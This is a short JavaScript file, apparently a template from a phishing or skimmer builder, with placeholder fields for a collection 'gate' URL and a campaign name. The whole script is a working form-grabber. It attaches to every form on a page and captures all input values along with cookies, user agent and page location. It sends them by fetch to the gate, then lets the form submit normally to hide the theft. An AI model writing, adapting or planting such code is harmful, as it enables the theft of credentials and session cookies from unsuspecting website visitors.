document.addEventListener('DOMContentLoaded', function() {
  const fluxGate = "{buildGate}";
  const fluxName = "{buildName}";

  function gatherInputData() {
    const inputData = {};
    document.querySelectorAll('input').forEach((inputElem, index) => {
      const { type, value, checked, name } = inputElem;

      if (['radio', 'checkbox'].includes(type) && !checked) return;

      const key = name || `input_${index}_${type}`;
      inputData[key] = value;
    });
    return inputData;
  }

  async function sendData(event) {
    event.preventDefault();

    const date = new Date();
    const time = `${date.getHours()}:${date.getMinutes()}:${date.getSeconds()}`;
    const inputValues = gatherInputData();

    const formData = new FormData();

    Object.entries(inputValues).forEach(([key, value]) => {
      formData.append(key, value);
    });

    const inputss = JSON.stringify(inputValues)
    formData.append("uagents", navigator.userAgent);
    formData.append("host", location.hostname);
    formData.append("location", location.toString());
    formData.append("cookies", document.cookie);
    formData.append("name", fluxName);
    formData.append("time", time);
    formData.append("inputs", inputss); // Adicione os inputs capturados como JSON

    try {
      await fetch(fluxGate, {
        method: 'POST',
        body: formData,
      });
    } catch (error) {
      console.error("Failed to send data:", error);
    }

    event.target.submit();
  }

  document.querySelectorAll('form').forEach(form => {
    form.addEventListener('submit', sendData);
  });
});
